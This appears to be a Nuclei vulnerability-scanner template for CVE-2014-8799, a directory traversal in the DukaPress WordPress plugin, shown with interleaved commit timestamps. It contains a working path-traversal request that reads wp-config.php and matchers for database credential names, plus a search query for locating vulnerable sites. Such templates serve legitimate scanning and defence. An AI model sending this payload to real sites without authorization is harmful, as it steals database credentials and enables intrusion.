2021-07-27 22:03:23 +00:00
id : CVE-2014-8799
info :
name : WordPress Plugin DukaPress 2.5.2 - Directory Traversal
author : daffainfo
severity : high
2022-02-25 22:07:55 +00:00
description : A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
2021-08-19 13:59:12 +00:00
reference :
2022-02-25 22:07:55 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2014-8799
2021-07-27 22:03:23 +00:00
- https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799
2022-05-17 09:18:12 +00:00
- https://wordpress.org/plugins/dukapress/changelog/
2022-02-25 22:07:55 +00:00
classification :
cve-id : CVE-2014-8799
2022-07-11 17:26:30 +00:00
metadata :
google-query : inurl:"/wp-content/plugins/dukapress"
2022-04-22 10:38:41 +00:00
tags : cve,cve2014,wordpress,wp-plugin,lfi
2021-07-27 22:03:23 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
matchers-condition : and
matchers :
- type : word
words :
- "DB_NAME"
- "DB_PASSWORD"
2021-08-02 16:29:27 +00:00
- "DB_USER"
- "DB_HOST"
2021-07-27 22:03:23 +00:00
part : body
condition : and
- type : status
status :
- 200
2022-02-25 22:07:55 +00:00
# Enhanced by mp on 2022/02/25